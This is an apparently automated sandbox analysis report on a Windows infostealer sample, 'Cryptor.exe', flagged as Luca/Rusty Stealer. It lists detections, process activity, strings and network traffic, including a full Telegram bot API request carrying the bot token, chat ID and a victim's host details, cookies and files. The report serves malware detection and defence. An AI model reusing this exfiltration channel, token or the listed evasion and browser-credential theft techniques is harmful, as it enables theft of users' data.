Edit tour

Windows Analysis Report
Cryptor.exe

Overview

General Information

Sample name:	Cryptor.exe
Analysis ID:	1450341
MD5:	4ca40d9d318d97d68fcb518e2c4fe07a
SHA1:	5fc2e90b7bc1aa4d00c2dc9e0064056b3956e425
SHA256:	7f988e3a23998e57784262affa784e9cc63ee9494ece3bf5274a7433f4ffab46
Tags:	exeRustyStealer
Infos:

Detection

Luca Stealer, Rusty Stealer

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Luca Stealer

Yara detected Rusty Stealer

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses the Telegram API (likely for C&C communication)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Classification

Process Tree

System is w10x64

Cryptor.exe (PID: 6388 cmdline: "C:\Users\user\Desktop\Cryptor.exe" MD5: 4CA40D9D318D97D68FCB518E2C4FE07A)

powershell.exe (PID: 7180 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1818390971.00007FF6213B0000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_LucaStealer	Yara detected Luca Stealer	Joe Security
00000000.00000003.1816751738.0000020DA5C09000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LucaStealer	Yara detected Luca Stealer	Joe Security
00000000.00000002.1817452314.0000020DA5C09000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LucaStealer	Yara detected Luca Stealer	Joe Security
00000000.00000003.1816891652.0000020DA5C09000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LucaStealer	Yara detected Luca Stealer	Joe Security
Process Memory Space: Cryptor.exe PID: 6388	JoeSecurity_LucaStealer	Yara detected Luca Stealer	Joe Security
Process Memory Space: Cryptor.exe PID: 6388	JoeSecurity_RustyStealer	Yara detected Rusty Stealer	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Cryptor.exe.7ff620fa0000.0.unpack	JoeSecurity_LucaStealer	Yara detected Luca Stealer	Joe Security

Sigma Signatures

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Cryptor.exe", ParentImage: C:\Users\user\Desktop\Cryptor.exe, ParentProcessId: 6388, ParentProcessName: Cryptor.exe, ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", ProcessId: 7180, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Cryptor.exe	ReversingLabs: Detection: 54%
Source: Cryptor.exe	Virustotal: Detection: 47%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.5% probability

Machine Learning detection for sample

Source: Cryptor.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: Cryptor.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: p\wctF411.tmpload_prod.pdbfJxDpwp\* source: Cryptor.exe, 00000000.00000002.1817452314.0000020DA5BF0000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000003.1816751738.0000020DA5BD3000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000003.1816891652.0000020DA5BEC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: p\wctF411.tmpload_prod.pdbfJxDpwp source: Cryptor.exe, 00000000.00000002.1817452314.0000020DA5BF0000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000003.1816751738.0000020DA5BD3000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000003.1816891652.0000020DA5BEC000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\	Jump to behavior

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: POST /bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-4003506161&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.91%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20RZTBNVDC%20(1280,%201024)%0AHWID:%203165415708104312%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Cryptor.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%2025%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=1e2bc9e1558d1d3c-3ca81ea8819fc179-863c2ef7186280ce-fd1fe01ce8266f14content-length: 893620accept: /host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /?output=json HTTP/1.1accept: /host: ipwho.is

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 195.201.57.90 195.201.57.90
Source: Joe Sandbox View	IP Address: 195.201.57.90 195.201.57.90

Source: Joe Sandbox View

ASN Name: TELEGRAMRU TELEGRAMRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ipwho.is

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is

Source: global traffic	DNS traffic detected: DNS query: ipwho.is
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-4003506161&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.91%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20RZTBNVDC%20(1280,%201024)%0AHWID:%203165415708104312%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Cryptor.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%2025%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=1e2bc9e1558d1d3c-3ca81ea8819fc179-863c2ef7186280ce-fd1fe01ce8266f14content-length: 893620accept: */*host: api.telegram.org

Source: Cryptor.exe, 00000000.00000003.1816514495.0000020DA5C40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Cryptor.exe, 00000000.00000003.1816591865.0000020DA5C48000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000003.1816996414.0000020DA5C58000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000003.1802367277.0000020DA5C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-400
Source: Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Cryptor.exe, 00000000.00000003.1816751738.0000020DA5BD3000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000002.1817360404.0000020DA5BD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ipwhois.io/flags/us.svg
Source: Cryptor.exe, 00000000.00000003.1816751738.0000020DA5BD3000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000002.1817360404.0000020DA5BD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ipwhois.io/flags/us.svg3
Source: Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Cryptor.exe, 00000000.00000002.1818390971.00007FF6213B0000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportCalling
Source: Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Cryptor.exe, 00000000.00000003.1702787122.0000020DA5C73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Cryptor.exe, 00000000.00000003.1702968791.0000020DA5C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Cryptor.exe, 00000000.00000003.1702787122.0000020DA5C73000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000003.1703075101.0000020DA5C61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Cryptor.exe, 00000000.00000003.1703075101.0000020DA5C61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170
Source: Cryptor.exe, 00000000.00000003.1702968791.0000020DA5C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: classification engine

Classification label: mal92.troj.spyw.evad.winEXE@4/14@2/2

Source: C:\Users\user\Desktop\Cryptor.exe

File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL

Source: C:\Users\user\Desktop\Cryptor.exe

File created: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\

Jump to behavior

Source: C:\Users\user\Desktop\Cryptor.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Users\user\Desktop\Cryptor.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Cryptor.exe, 00000000.00000002.1818390971.00007FF6213B0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Cryptor.exe, 00000000.00000002.1818390971.00007FF6213B0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Cryptor.exe, 00000000.00000002.1818390971.00007FF6213B0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Cryptor.exe, 00000000.00000002.1818390971.00007FF6213B0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: Cryptor.exe, 00000000.00000002.1818390971.00007FF6213B0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Cryptor.exe, 00000000.00000002.1818390971.00007FF6213B0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Cryptor.exe, 00000000.00000003.1701673342.0000020DA5C3A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Cryptor.exe, 00000000.00000002.1818390971.00007FF6213B0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: Cryptor.exe	ReversingLabs: Detection: 54%
Source: Cryptor.exe	Virustotal: Detection: 47%

Source: unknown	Process created: C:\Users\user\Desktop\Cryptor.exe "C:\Users\user\Desktop\Cryptor.exe"
Source: C:\Users\user\Desktop\Cryptor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture \| Select -ExpandProperty DisplayName"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Cryptor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture \| Select -ExpandProperty DisplayName"	Jump to behavior

Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Users\user\Desktop\Cryptor.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Cryptor.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: Cryptor.exe

Static file information: File size 3037184 > 1048576

Source: Cryptor.exe

Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x2e4e00

Source: Cryptor.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: p\wctF411.tmpload_prod.pdbfJxDpwp\* source: Cryptor.exe, 00000000.00000002.1817452314.0000020DA5BF0000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000003.1816751738.0000020DA5BD3000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000003.1816891652.0000020DA5BEC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: p\wctF411.tmpload_prod.pdbfJxDpwp source: Cryptor.exe, 00000000.00000002.1817452314.0000020DA5BF0000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000003.1816751738.0000020DA5BD3000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000003.1816891652.0000020DA5BEC000.00000004.00000020.00020000.00000000.sdmp

Source: Cryptor.exe

Static PE information: section name: UPX2

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\Cryptor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
